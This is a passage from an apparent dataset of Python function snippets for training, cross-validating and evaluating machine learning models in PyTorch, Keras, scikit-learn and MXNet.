valid_accs.append(valid_acc)\n\n if not validation:\n print(\"{}, {}, {}, fold {}: train acc/auc: {:.5f}/{:.5f}, test acc/auc: {:.5f}/{:.5f}, train time: {}\"\n .format(self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n i, train_acc, train_auc, test_acc, test_auc, train_time))\n else:\n print(\n \"{}, {}, {}, fold {}: train acc/auc: {:.5f}/{:.5f}, test acc/auc: {:.5f}/{:.5f}, valid acc/auc: {:.5f}/{:.5f}, train time: {}\"\n .format(self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n i, train_acc, train_auc, test_acc, test_auc, valid_acc, valid_auc, train_time))\n\n if not validation:\n self.writer.write_result_train_test(\n self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n numpy.mean(durations), numpy.mean(train_accs), numpy.mean(train_aucs),\n numpy.mean(test_accs), numpy.mean(test_aucs))\n else:\n self.writer.write_result_train_test_valid(\n self.reader.data_src, self.print_model(model), self.reader.print_feature_config(),\n numpy.mean(durations),\n numpy.mean(train_accs), numpy.mean(train_aucs),\n numpy.mean(test_accs), numpy.mean(test_aucs),\n numpy.mean(valid_accs), numpy.mean(valid_aucs),\n )\n\n self.reader.save_match_id_record()\n self.last_model = model", "def validate_pathloss_svr():\n svr = SVR(kernel='rbf', C=1.0, epsilon=0.2)\n linear_model = RandomForestRegressor()\n with open('pathloss_data.csv') as f:\n X, y = np.loadtxt(f, delimiter=',', usecols=(0, 1), unpack=True)\n kf = KFold(n_splits=10)\n mses = []\n for train_index, test_index in kf.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n # svr.fit(X_train.reshape(-1, 1), y_train)\n # y_predict = svr.predict(X_test.reshape(-1, 1))\n linear_model.fit(X_train.reshape(-1, 1), y_train)\n y_predict = linear_model.predict(X_test.reshape(-1, 1))\n mse = np.sqrt(mean_squared_error(y_test, y_predict))\n mses.append(mse)\n print('Train fold: {}'.format(train_index))\n return mses", "def validate(val_loader, model, epoch, cfg):\n 
batch_time = meter.TimeMeter(True)\n data_time = meter.TimeMeter(True)\n prec = meter.ClassErrorMeter(topk=[1], accuracy=True)\n\n # testing mode\n model.eval()\n\n for i, (meshes, adjs, labels) in enumerate(val_loader):\n batch_time.reset()\n # bz x n x 3\n labels = labels.long().view(-1)\n\n # shift data to GPU\n if cfg.cuda:\n meshes = meshes.cuda()\n adjs = adjs.cuda()\n labels = labels.cuda()\n\n # forward, backward optimize\n preds = model(meshes, adjs)\n\n prec.add(preds.cpu().data.numpy(), labels.item())\n\n if i % cfg.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Batch Time {batch_time:.3f}\\t'\n 'Epoch Time {data_time:.3f}\\t'\n 'Prec@1 {top1:.3f}\\t'.format(\n epoch, i, len(val_loader), batch_time=batch_time.value(),\n data_time=data_time.value(), top1=prec.value(1)))\n\n print('mean class accuracy at epoch {0}: {1} '.format(epoch, prec.value(1)))\n\n return prec.value(1)", "def __init__(self,\r\n model_class=ModelLinear,\r\n loss_func=torch.nn.BCELoss(reduction='none'),\r\n scoring_func=None,\r\n epochs=1000, batch_size=-1,\r\n adam=False,\r\n lr=1e-1, momentum=0.9,\r\n l1_reg=0, l2_reg=0,\r\n weighted_samples=False,\r\n gpu=True, used_gpu=0, sample_gpu=False,\r\n verbose=0,\r\n **kwargs):\r\n super().__init__()\r\n\r\n self.model_class = model_class\r\n self.loss_func = loss_func\r\n self.scoring_func = scoring_func\r\n self.epochs = epochs\r\n self.batch_size = batch_size\r\n self.adam = adam\r\n self.lr = lr\r\n self.momentum = momentum\r\n self.l1_reg = l1_reg\r\n self.l2_reg = l2_reg\r\n self.weighted_samples = weighted_samples\r\n self.gpu = gpu\r\n self.used_gpu = used_gpu\r\n self.sample_gpu = sample_gpu\r\n self.verbose = verbose\r\n\r\n if kwargs:\r\n # additional arguments keys stored for use within fit()\r\n self.additional_args = list(kwargs)\r\n # additional arguments stored as properties for cross_val\r\n self.__dict__.update(kwargs)\r\n else:\r\n self.additional_args = []\r\n\r\n if verbose > 1:\r\n print(\"Model will be instanciated using the following arguments:\",\r\n self.__dict__)", "def validation_step(self, *args: Any, **kwargs: Any) -> None:\n batch = args[0]\n batch_idx = args[1]\n x = batch[\"image\"]\n y = batch[\"mask\"]\n y_hat = self(x)\n y_hat_hard = y_hat.argmax(dim=1)\n\n loss = self.loss(y_hat, y)\n\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True)\n self.val_metrics(y_hat_hard, y)\n\n if (\n batch_idx < 10\n and hasattr(self.trainer, \"datamodule\")\n and self.logger\n and hasattr(self.logger, \"experiment\")\n and hasattr(self.logger.experiment, \"add_figure\")\n ):\n try:\n datamodule = self.trainer.datamodule\n batch[\"prediction\"] = y_hat_hard\n for key in [\"image\", \"mask\", \"prediction\"]:\n batch[key] = batch[key].cpu()\n sample = unbind_samples(batch)[0]\n fig = datamodule.plot(sample)\n summary_writer = self.logger.experiment\n summary_writer.add_figure(\n f\"image/{batch_idx}\", fig, global_step=self.global_step\n )\n plt.close()\n except ValueError:\n pass", "def train(model, ids, data, scaler):\n if model.model_type == 'torch':\n train_ids, val_ids, _, _ = train_test_split(ids, ids, test_size=0.1, random_state=1)\n train_loader = double_loader(data, train_ids, batch_size=model.batch_size)\n val_loader = double_loader(data, val_ids, batch_size=len(val_ids))\n \n regressor = copy.deepcopy(model.model) \n optimiser = model.optimiser(regressor.parameters(), lr=model.lr)\n loss_function = torch.nn.MSELoss()\n name = model.name.replace(' ','_')\n early_stopping = EarlyStopping(name,regressor)\n \n for epoch in 
range(model.num_epochs):\n #train\n for (sol,solv,targets) in train_loader:\n if model.data_type == 'sentences':\n sol, solv = sol.to(device), solv.to(device)\n targets = targets.view(-1,1)\n targets = scaler.transform(targets)\n optimiser.zero_grad()\n outputs = regressor(sol,solv).to(device)\n cuda_targets = targets.to(device)\n loss = loss_function(outputs, cuda_targets)\n loss.backward()\n optimiser.step()\n #evaluate\n for (sol,solv,targets) in val_loader:\n if model.data_type == 'sentences':\n sol, solv = sol.to(device), solv.to(device)\n targets = targets.view(-1,1)\n targets = scaler.transform(targets)\n outputs = regressor(sol,solv).to(device)\n cuda_targets = targets.to(device)\n loss = loss_function(outputs, cuda_targets)\n val_loss = loss.item()\n #early stopping\n early_stopping.store(val_loss, regressor)\n if early_stopping.stop:\n #print(\"Stopping at epoch \"+str(epoch))\n break\n regressor.load_state_dict(torch.load('checkpoints/'+name+'.pt'))\n else:\n regressor = sklearn.base.clone(model.model)\n targets = scaler.transform(data[1][ids])\n regressor.fit(data[0][ids], targets)\n return regressor", "def validate(net, val_data, ctx, eval_metric, size, args):\n clipper = gcv.nn.bbox.BBoxClipToImage()\n eval_metric.reset()\n # set nms threshold and topk constraint\n net.set_nms(nms_thresh=0.45, nms_topk=400)\n mx.nd.waitall()\n net.hybridize()\n\n with tqdm(total=size) as pbar:\n for ib, batch in enumerate(val_data):\n # if(ib >= 200):\n # break\n batch = split_and_load(batch, ctx_list=ctx)\n det_bboxes = []\n det_ids = []\n det_scores = []\n det_coefs = []\n det_infos = []\n\n for x, im_info in zip(*batch):\n # get prediction results\n t1 = time.time()\n ids, scores, bboxes, coefs = net(x)\n t2 = time.time()\n det_bboxes.append(clipper(bboxes, x))\n det_ids.append(ids)\n det_scores.append(scores)\n det_coefs.append(coefs)\n det_infos.append(im_info)\n\n # update metric\n for det_bbox, det_id, det_score, def_coef, det_info in zip(det_bboxes, det_ids, det_scores, det_coefs, det_infos):\n for i in range(det_info.shape[0]):\n # numpy everything\n det_bbox = det_bbox[i].asnumpy()\n det_id = det_id[i].asnumpy()\n det_score = det_score[i].asnumpy()\n def_coef = def_coef[i].asnumpy()\n det_info = det_info[i].asnumpy()\n # filter by conf threshold\n im_height, im_width = det_info\n valid = np.where(((det_id >= 0) & (det_score >= 0.001)))[0]\n det_id = det_id[valid]\n det_score = det_score[valid]\n # To bbox of original img size\n det_bbox = det_bbox[valid]\n det_bbox[:, 0] *= (im_width / 416.0)\n det_bbox[:, 2] *= (im_width / 416.0)\n det_bbox[:, 1] *= (im_height / 416.0)\n det_bbox[:, 3] *= (im_height / 416.0)\n\n def_coef = def_coef[valid]\n eval_metric.update(det_bbox, det_id, det_score, def_coef, int(im_height), int(im_width))\n\n pbar.update(len(ctx))\n\n return eval_metric.get()", "def validation_dubo(latent_dim, covar_module0, covar_module1, likelihood, train_xt, m, log_v, z, P, T, eps):\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n v = torch.exp(log_v)\n torch_dtype = torch.double\n x_st = torch.reshape(train_xt, [P, T, train_xt.shape[1]]).to(device)\n stacked_x_st = torch.stack([x_st for i in range(latent_dim)], dim=1)\n K0xz = covar_module0(train_xt, z).evaluate().to(device)\n K0zz = (covar_module0(z, z).evaluate() + eps * torch.eye(z.shape[1], dtype=torch_dtype).to(device)).to(device)\n LK0zz = torch.cholesky(K0zz).to(device)\n iK0zz = torch.cholesky_solve(torch.eye(z.shape[1], dtype=torch_dtype).to(device), LK0zz).to(device)\n K0_st = 
covar_module0(stacked_x_st, stacked_x_st).evaluate().transpose(0,1)\n B_st = (covar_module1(stacked_x_st, stacked_x_st).evaluate() + torch.eye(T, dtype=torch.double).to(device) * likelihood.noise_covar.noise.unsqueeze(dim=2)).transpose(0,1)\n LB_st = torch.cholesky(B_st).to(device)\n iB_st = torch.cholesky_solve(torch.eye(T, dtype=torch_dtype).to(device), LB_st)\n\n dubo_sum = torch.tensor([0.0]).double().to(device)\n for i in range(latent_dim):\n m_st = torch.reshape(m[:, i], [P, T, 1]).to(device)\n v_st = torch.reshape(v[:, i], [P, T]).to(device)\n K0xz_st = torch.reshape(K0xz[i], [P, T, K0xz.shape[2]]).to(device)\n iB_K0xz = torch.matmul(iB_st[i], K0xz_st).to(device)\n K0zx_iB_K0xz = torch.matmul(torch.transpose(K0xz[i], 0, 1), torch.reshape(iB_K0xz, [P*T, K0xz.shape[2]])).to(device)\n W = K0zz[i] + K0zx_iB_K0xz\n W = (W + W.T) / 2\n LW = torch.cholesky(W).to(device)\n logDetK0zz = 2 * torch.sum(torch.log(torch.diagonal(LK0zz[i]))).to(device)\n logDetB = 2 * torch.sum(torch.log(torch.diagonal(LB_st[i], dim1=-2, dim2=-1))).to(device)\n logDetW = 2 * torch.sum(torch.log(torch.diagonal(LW))).to(device)\n logDetSigma = -logDetK0zz + logDetB + logDetW\n iB_m_st = torch.solve(m_st, B_st[i])[0].to(device)\n qF1 = torch.sum(m_st*iB_m_st).to(device)\n p = torch.matmul(K0xz[i].T, torch.reshape(iB_m_st, [P * T])).to(device)\n qF2 = torch.sum(torch.triangular_solve(p[:,None], LW, upper=False)[0] ** 2).to(device)\n qF = qF1 - qF2\n tr = torch.sum(iB_st[i] * K0_st[i]) - torch.sum(K0zx_iB_K0xz * iK0zz[i])\n logDetD = torch.sum(torch.log(v[:, i])).to(device)\n tr_iB_D = torch.sum(torch.diagonal(iB_st[i], dim1=-2, dim2=-1)*v_st).to(device)\n D05_iB_K0xz = torch.reshape(iB_K0xz*torch.sqrt(v_st)[:,:,None], [P*T, K0xz.shape[2]])\n K0zx_iB_D_iB_K0zx = torch.matmul(torch.transpose(D05_iB_K0xz,0,1), D05_iB_K0xz).to(device)\n tr_iB_K0xz_iW_K0zx_iB_D = torch.sum(torch.diagonal(torch.cholesky_solve(K0zx_iB_D_iB_K0zx, LW))).to(device)\n tr_iSigma_D = tr_iB_D - tr_iB_K0xz_iW_K0zx_iB_D\n dubo = 0.5*(tr_iSigma_D + qF - P*T + logDetSigma - logDetD + tr)\n dubo_sum = dubo_sum + dubo\n return dubo_sum", "def visualize_cross_validation_results(cross_val_results, plots_filepath):\n\n pair_model_scores, pair_model_stds, \\\n siamese_model_scores_2, siamese_model_stds_2, \\\n siamese_model_scores_10, siamese_model_stds_10 = cross_val_results\n param_names = (\"NBCH1\", \"NBCH2\", \"NBFCH\", \"BATCH_NORM\", \"SKIP_CON\", \"LR\")\n\n def aggregate_results(scores, stds):\n \"\"\"\n Helper function to aggregate score means and standard deviations for a model across parameter values\n\n :param scores: dictionary of score means {param_combo: score_mean}\n :param stds: dictionary of score stds {param_combo: score_std}\n\n :returns: list of tuples of pandas.Dataframe objects containing aggregated mean and std data\n \"\"\"\n\n scores = pd.DataFrame(scores.values(),\n index=scores.keys(),\n columns=[\"SCORE MEAN\", ])\n stds = pd.DataFrame(stds.values(),\n index=stds.keys(),\n columns=[\"SCORE STD\", ])\n scores.index.name = param_names\n stds.index.name = param_names\n data = []\n for param_gropby_levels in ((0,), (1,), (2,), (3, 4), (5,)):\n aggregate_scores = scores.groupby(level=param_gropby_levels).mean()\n aggregate_stds = scores.groupby(level=param_gropby_levels).std()\n data.append((aggregate_scores, aggregate_stds))\n return data\n\n pair_model_data = aggregate_results(pair_model_scores, pair_model_stds)\n siamese_model_2_data = aggregate_results(siamese_model_scores_2, siamese_model_stds_2)\n siamese_model_10_data = 
aggregate_results(siamese_model_scores_10, siamese_model_stds_10)\n\n # Group results for all models\n model_names = (\"Pair\", \"Siamese 2\", \"Siamese 10\")\n grouped_data = []\n for pair_model_group_data, siamese_model_2_group_data, siamese_model_10_group_data in zip(pair_model_data,\n siamese_model_2_data,\n siamese_model_10_data):\n score_means = (pair_model_group_data[0], siamese_model_2_group_data[0], siamese_model_10_group_data[0])\n score_mean_data = pd.concat(score_means, axis=1)\n score_mean_data.columns = model_names\n\n score_stds = (pair_model_group_data[1], siamese_model_2_group_data[1], siamese_model_10_group_data[1])\n score_std_data = pd.concat(score_stds, axis=1)\n score_std_data.columns = model_names\n\n grouped_data.append((score_mean_data, score_std_data))\n\n plots_param_names = (\"nbch1\", \"nbch2\", \"nbfch\", \"batch_norm+skip_con\", \"lr\")\n for i, (plot_param_names, (score_mean_data, score_std_data)) in enumerate(zip(plots_param_names, grouped_data)):\n plt.figure(figsize=(10, 5))\n score_mean_data.plot(kind=\"line\" if plot_param_names == \"lr\" else \"bar\",\n yerr=score_std_data,\n capsize=5,\n ylim=(0.4, 1.1),\n colormap=colormap_brg_darker)\n plt.title(\"Cross validation results for parameters:\\n{}\".format(plot_param_names), fontsize=18)\n plt.xlabel(\"Parameter value\", fontsize=14)\n plt.ylabel(\"Average accuracy\", fontsize=14)\n plt.xticks(fontsize=12, rotation=30)\n plt.yticks(fontsize=12)\n plt.legend(title=\"Model\", title_fontsize=10)\n plt.tight_layout()\n plt.savefig(fname=plots_filepath + \"cross_validation_{}.eps\".format(plot_param_names),\n dpi=\"figure\", format=\"eps\")\n plt.close()", "def performance_metrics(model, X_train, y_train, X_test, y_test, train=True, cv=True):\n from sklearn.metrics import accuracy_score, classification_report, confusion_matrix, f1_score \n from sklearn.metrics import precision_score, recall_score, roc_auc_score\n from sklearn.model_selection import cross_validate, cross_val_score, StratifiedKFold\n scoring = {'acc': 'accuracy',\n 'prec_micro': 'precision_micro',\n 'rec_micro': 'recall_micro',\n 'f1_micro': 'f1_micro',\n 'auc':'roc_auc'} \n if train==True:\n if cv==True:\n kfold=StratifiedKFold(n_splits=10, random_state=42)\n scores = cross_validate(model, X_train, y_train, scoring=scoring, cv=kfold)\n ypredTrain = model.predict(X_train)\n Acc_train = scores['test_acc'].mean()\n Precision_train = scores['test_prec_micro'].mean()\n Recall_train = scores['test_rec_micro'].mean()\n F1_train = scores['test_f1_micro'].mean()\n AUC_train = scores['test_auc'].mean()\n conf_matrix_train = confusion_matrix(y_train, ypredTrain)\n class_report = classification_report(y_train, ypredTrain)\n print(\"TRAIN:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_train:.2f}\\n\")\n print(f\"CV - Precision: {Precision_train:.2f}\\n\")\n print(f\"CV - Recall: {Recall_train:.2f}\\n\")\n print(f\"CV - F1 score: {F1_train:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_train:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_train}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\") \n elif cv==False:\n scores = cross_validate(model, X_train, y_train, scoring=scoring)\n ypredTrain = model.predict(X_train)\n Acc_train = scores['test_acc'].mean()\n Precision_train = scores['test_prec_micro'].mean()\n Recall_train = scores['test_rec_micro'].mean()\n F1_train = scores['test_f1_micro'].mean()\n AUC_train = scores['test_auc'].mean()\n conf_matrix_train = confusion_matrix(y_train, ypredTrain)\n 
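The scoring pattern used in the performance_metrics entry can be reproduced with scikit-learn's cross_validate and a multi-metric scoring dict; a minimal sketch under hypothetical data and model choices:

import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold, cross_validate

# Hypothetical binary-classification data; replace with the real X and y.
X, y = make_classification(n_samples=300, n_features=20, random_state=42)

scoring = {"acc": "accuracy", "f1": "f1", "auc": "roc_auc"}
cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=42)
scores = cross_validate(RandomForestClassifier(random_state=42), X, y,
                        scoring=scoring, cv=cv)

# cross_validate returns one array per scorer under the key "test_<name>"
for name in scoring:
    vals = scores["test_" + name]
    print("%s: %.3f +/- %.3f" % (name, np.mean(vals), np.std(vals)))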
class_report = classification_report(y_train, ypredTrain)\n print(\"TRAIN:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_train:.2f}\\n\")\n print(f\"CV - Precision: {Precision_train:.2f}\\n\")\n print(f\"CV - Recall: {Recall_train:.2f}\\n\")\n print(f\"CV - F1 score: {F1_train:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_train:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_train}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\")\n elif train==False:\n if cv==True:\n kfold=StratifiedKFold(n_splits=10, random_state=42)\n scores = cross_validate(model, X_test, y_test, scoring=scoring, cv=kfold)\n ypredTest = model.predict(X_test)\n Acc_test = scores['test_acc'].mean()\n Precision_test = scores['test_prec_micro'].mean()\n Recall_test = scores['test_rec_micro'].mean()\n F1_test = scores['test_f1_micro'].mean()\n AUC_test = scores['test_auc'].mean()\n conf_matrix_test = confusion_matrix(y_test, ypredTest)\n class_report = classification_report(y_test, ypredTest) \n print(\"TEST:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_test:.2f}\\n\")\n print(f\"CV - Precision: {Precision_test:.2f}\\n\")\n print(f\"CV - Recall: {Recall_test:.2f}\\n\")\n print(f\"CV - F1 score: {F1_test:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_test:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_test}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\")\n elif cv==False:\n scores = cross_validate(model, X_test, y_test, scoring=scoring)\n ypredTest = model.predict(X_test)\n Acc_test = scores['test_acc'].mean()\n Precision_test = scores['test_prec_micro'].mean()\n Recall_test = scores['test_rec_micro'].mean()\n F1_test = scores['test_f1_micro'].mean()\n AUC_test = scores['test_auc'].mean()\n conf_matrix_test = confusion_matrix(y_test, ypredTest)\n class_report = classification_report(y_test, ypredTest) \n print(\"TEST:\\n===========================================\")\n print(f\"CV - Accuracy : {Acc_test:.2f}\\n\")\n print(f\"CV - Precision: {Precision_test:.2f}\\n\")\n print(f\"CV - Recall: {Recall_test:.2f}\\n\")\n print(f\"CV - F1 score: {F1_test:.2f}\\n\") \n print(f\"CV - AUC score: {AUC_test:.2f}\\n\") \n print(f\"Confusion Matrix:\\n {conf_matrix_test}\\n\")\n print(f\"Classification Report:\\n {class_report}\\n\")", "def validation_step(self, batch, batch_idx):\n\n src_batch, trg_batch = batch\n\n src_seq = src_batch[\"src_ids\"]\n # change from [batch, seq_len] -> to [seq_len, batch]\n src_seq = src_seq.transpose(0, 1)\n src_lengths = src_batch[\"src_lengths\"]\n\n trg_seq = trg_batch[\"trg_ids\"]\n # change from [batch, seq_len] -> to [seq_len, batch]\n trg_seq = trg_seq.transpose(0, 1)\n trg_lengths = trg_batch[\"trg_lengths\"]\n\n outputs = self.forward(src_seq, src_lengths, trg_seq, 0)\n\n # # without sos token at the beginning and eos token at the end\n logits = outputs[1:].view(-1, self.output_dim)\n\n # trg = trg_seq[1:].view(-1)\n\n trg = trg_seq[1:].reshape(-1)\n\n # trg = [(trg len - 1) * batch size]\n # output = [(trg len - 1) * batch size, output dim]\n\n loss = self.loss(logits, trg)\n\n # take without first sos token, and reduce by 2 dimension, take index of max logits (make prediction)\n # seq_len * batch size * vocab_size -> seq_len * batch_size\n\n pred_seq = outputs[1:].argmax(2)\n\n # change layout: seq_len * batch_size -> batch_size * seq_len\n pred_seq = pred_seq.T\n\n # change layout: seq_len * batch_size -> batch_size * seq_len\n trg_batch = trg_seq[1:].T\n\n # compere list of 
predicted ids for all sequences in a batch to targets\n acc = plfunc.accuracy(pred_seq.reshape(-1), trg_batch.reshape(-1))\n\n # need to cast to list of predicted sequences (as list of token ids) [ [seq1_tok1, seq1_tok2, ...seq1_tokN],..., [seqK_tok1, seqK_tok2, ...seqK_tokZ]]\n predicted_ids = pred_seq.tolist()\n\n # need to add additional dim to each target reference sequence in order to\n # convert to format needed by bleu_score function [ seq1=[ [reference1], [reference2] ], seq2=[ [reference1] ] ]\n target_ids = torch.unsqueeze(trg_batch, 1).tolist()\n\n # bleu score needs two arguments\n # first: predicted_ids - list of predicted sequences as a list of predicted ids\n # second: target_ids - list of references (can be many, list)\n bleu_score = plfunc.nlp.bleu_score(predicted_ids, target_ids, n_gram=3).to(\n self.device\n ) # torch.unsqueeze(trg_batchT,1).tolist())\n\n self.log(\n \"val_loss\",\n loss,\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n logger=True,\n sync_dist=True,\n )\n self.log(\n \"val_acc\",\n acc,\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n logger=True,\n sync_dist=True,\n )\n self.log(\n \"val_bleu_idx\",\n bleu_score,\n on_step=False,\n on_epoch=True,\n prog_bar=True,\n logger=True,\n sync_dist=True,\n )\n\n return loss, acc, bleu_score", "def train_model(model,x_train, n_y_array,x_val, vald_array, Epochs_size, Batch_size):\n\n cb = EarlyStopping(monitor='val_loss', mode = \"min\", patience = 5 , verbose=1)\n\n mc = ModelCheckpoint(filepath='model_C3_15b.h5', monitor='val_loss', mode='min', save_best_only=True, verbose=1)\n\n print(\"training has started\")\n\n history = model.fit(x_train, n_y_array, callbacks = [cb,mc], validation_data=(x_val, vald_array),\n\n batch_size=Batch_size, nb_epoch=Epochs_size)\n\n return(history)", "def train_val_training(X_train, y_train, model):\n # set pach where trained models will be saved to \n savepath = Path('/home/kwaygo/Documents/NUS/SPH6004/P2/SPH6004_P2/models/Regression')\n checkpoint_name = os.path.join(savepath, 'Weights-{epoch:03d}--{val_loss:.5f}.hdf5' ) \n # define callbacks\n cp = ModelCheckpoint(checkpoint_name, monitor='val_loss', verbose = 1, save_best_only = True, mode ='auto')\n es = EarlyStopping(monitor='val_loss', patience= 4, verbose=1)\n callbacks_list = [es, cp]\n # start training\n hist = model.fit(X_train, y_train, epochs=500, batch_size=500, validation_split = 0.2, callbacks=callbacks_list) \n \n print(\"[INFO] avg. 
ICU LOS of train set: {}, std ICU LOS of test set: {}\".format(np.mean(y_train), np.std(y_train)))\n # plot training History \n plotHist(hist)\n return model", "def validate(model, criterion, valset, iteration, batch_size, n_gpus,\n collate_fn, logger, rank):\n \n model.eval()\n \n with torch.no_grad():\n val_sampler = DistributedSampler(valset) if n_gpus > 1 else None\n val_loader = DataLoader(\n valset,\n sampler=val_sampler,\n num_workers=1, \n shuffle=False,\n batch_size=batch_size,\n pin_memory=False,\n collate_fn=collate_fn\n )\n\n val_loss = 0.0\n\n for i, batch in enumerate(val_loader):\n x, y = model.parse_batch(batch)\n y_pred = model(x)\n loss = criterion(y_pred, y)\n reduced_val_loss = reduce_tensor(loss.data, n_gpus).item() \\\n if n_gpus > 1 else loss.item()\n val_loss += reduced_val_loss\n val_loss = val_loss / (i + 1)\n \n model.train()\n\n if rank == 0:\n print(\"Validation loss {}: {:9f} \".format(iteration, reduced_val_loss))\n logger.log_validation(reduced_val_loss, model, y, y_pred, iteration)\n \n return val_loss", "def set_cross_validation(x,y):\n\tx_train_1 = x[50:]\n\ty_train_1 = y[50:]\n\tx_test_1 = x[:50]\n\ty_test_1 = y[:50]\n\tx_train_2 = np.concatenate((x[:50], x[100:]),axis=0)\n\ty_train_2 = np.concatenate((y[:50], y[100:]),axis=0)\n\tx_test_2 = x[50:100]\n\ty_test_2 = y[50:100]\n\tx_train_3 = np.concatenate((x[:100], x[150:]),axis=0)\n\ty_train_3 = np.concatenate((y[:100], y[150:]),axis=0)\n\tx_test_3 = x[100:150]\n\ty_test_3 = y[100:150]\n\tx_train_4 = x[:150]\n\ty_train_4 = y[:150]\n\tx_test_4 = x[150:]\n\ty_test_4 = y[150:]\n\n\tx_train = [x_train_1,x_train_2,x_train_3,x_train_4]\n\ty_train = [y_train_1,y_train_2,y_train_3,y_train_4]\n\tx_test = [x_test_1,x_test_2,x_test_3,x_test_4]\n\ty_test = [y_test_1,y_test_2,y_test_3,y_test_4]\n\t# print 'cross val shapes', x_train.shape, y_train.shape, x_test.shape, y_test.shape\n\treturn x_train, y_train, x_test, y_test", "def test():\n real_clusters, ei = create_clusters()\n real_data, labels, step_nb = create_emitter_comparison_with_cluster(\n real_clusters, ei)\n logger.info(labels)\n\n model = Sequential()\n model.add(LSTM(units=128, input_shape=(2, 50)))\n model.add(Dense(1, activation=\"sigmoid\"))\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=[\n 'accuracy', f1_score_threshold(), precision_threshold(), recall_threshold()])\n model.load_weights(WEIGHTS_DIR+'/my_model_clusters_weights.h5')\n\n to_predict = np.array(real_data)\n predictions = model.predict(to_predict)\n predictions = np.array([k[0] for k in predictions])\n\n labels = np.array(labels)\n thresholdlist = np.arange(50, 2000, 50)\n\n recall_0_list = []\n recall_1_list = []\n precision_0_list = []\n precision_1_list = []\n\n for k in thresholdlist:\n scores, true_predictions, true_labels = prediction_processing(\n predictions, labels, k, step_nb)\n recall_1_list.append(scores[0])\n recall_0_list.append(scores[1])\n precision_1_list.append(scores[2])\n precision_0_list.append(scores[3])\n fig = plt.figure(0)\n ax = fig.add_subplot(2, 1, 1)\n plt.plot(thresholdlist, recall_0_list, 'bo',\n thresholdlist, recall_1_list, 'ro')\n\n ax2 = fig.add_subplot(2, 1, 2)\n\n plt.plot(thresholdlist, precision_0_list, 'bo',\n thresholdlist, precision_1_list, 'ro')\n plt.show()", "def validate(model, dataloader, criterion, device):\n\n # Prepare the model\n model.to(device)\n model.eval()\n\n # Creates metrics recorder\n metrics = Metrics()\n\n with torch.no_grad():\n # Iterates over batches\n for (_, inputs, labels) in Bar(dataloader):\n\n 
# Transforming inputs\n inputs, labels = inputs.to(device), labels.to(device)\n\n # Forward Pass\n outputs = model(inputs)\n\n # Get loss\n loss = criterion(outputs, labels)\n\n # Register on metrics\n _, predicted = torch.max(outputs.data, 1)\n metrics.batch(labels=labels, preds=predicted, loss=loss.item())\n\n # Print and return validation metrics\n metrics.print_one_liner(phase='Val')\n return metrics.summary()", "def fit(self, dataset, val_dataset=None, logging_path='', silent=True, verbose=True):\r\n save_prefix = 'ssd_{}_{}_{}'.format(self.img_size, self.backbone, dataset.dataset_type)\r\n\r\n # convert dataset to compatible format\r\n dataset = self.__prepare_dataset(dataset)\r\n\r\n # set save dir for checkpoint saving\r\n self.__create_model(dataset.classes)\r\n if verbose:\r\n print(\"Saving models as: {}\".format(save_prefix))\r\n\r\n checkpoints_folder = os.path.join(self.temp_path, '{}_checkpoints'.format(save_prefix))\r\n if self.checkpoint_after_iter != 0 and not os.path.exists(checkpoints_folder):\r\n # user set checkpoint_after_iter so checkpoints must be created\r\n # create checkpoint dir\r\n os.makedirs(checkpoints_folder, exist_ok=True)\r\n\r\n start_epoch = 0\r\n if self.checkpoint_load_iter > 0:\r\n # user set checkpoint_load_iter, so load a checkpoint\r\n checkpoint_name = self.checkpoint_str_format.format(self.checkpoint_load_iter)\r\n checkpoint_path = os.path.join(checkpoints_folder, checkpoint_name)\r\n try:\r\n self._model.load_parameters(checkpoint_path)\r\n start_epoch = self.checkpoint_load_iter + 1\r\n except FileNotFoundError as e:\r\n e.strerror = 'No such file or directory {}'.format(checkpoint_path)\r\n\r\n # set device\r\n # NOTE: multi-gpu a little bugged\r\n if 'cuda' in self.device:\r\n if mx.context.num_gpus() > 0:\r\n if self.device == 'cuda':\r\n ctx = [mx.gpu(0)]\r\n else:\r\n ctx = [mx.gpu(int(self.device.split(':')[1]))]\r\n else:\r\n ctx = [mx.cpu()]\r\n else:\r\n ctx = [mx.cpu()]\r\n\r\n with warnings.catch_warnings(record=True):\r\n warnings.simplefilter(\"always\")\r\n self._model.initialize()\r\n self._model.collect_params().reset_ctx(ctx[0])\r\n if verbose:\r\n print(\"Network:\")\r\n print(self._model)\r\n\r\n # get data loader\r\n with autograd.train_mode():\r\n _, _, anchors = self._model(mx.nd.zeros((1, 3, self.img_size, self.img_size), ctx[0]))\r\n anchors = anchors.as_in_context(mx.cpu())\r\n\r\n # transform dataset & get loader\r\n train_transform = presets.ssd.SSDDefaultTrainTransform(self.img_size, self.img_size, anchors)\r\n dataset = dataset.transform(train_transform)\r\n\r\n batchify_fn = Tuple(Stack(), Stack(), Stack())\r\n train_loader = gluon.data.DataLoader(\r\n dataset, self.batch_size, shuffle=True, batchify_fn=batchify_fn,\r\n last_batch='rollover', num_workers=self.num_workers\r\n )\r\n\r\n trainer = gluon.Trainer(self._model.collect_params(),\r\n 'sgd', {'learning_rate': self.lr,\r\n 'wd': self.weight_decay,\r\n 'momentum': self.momentum},\r\n 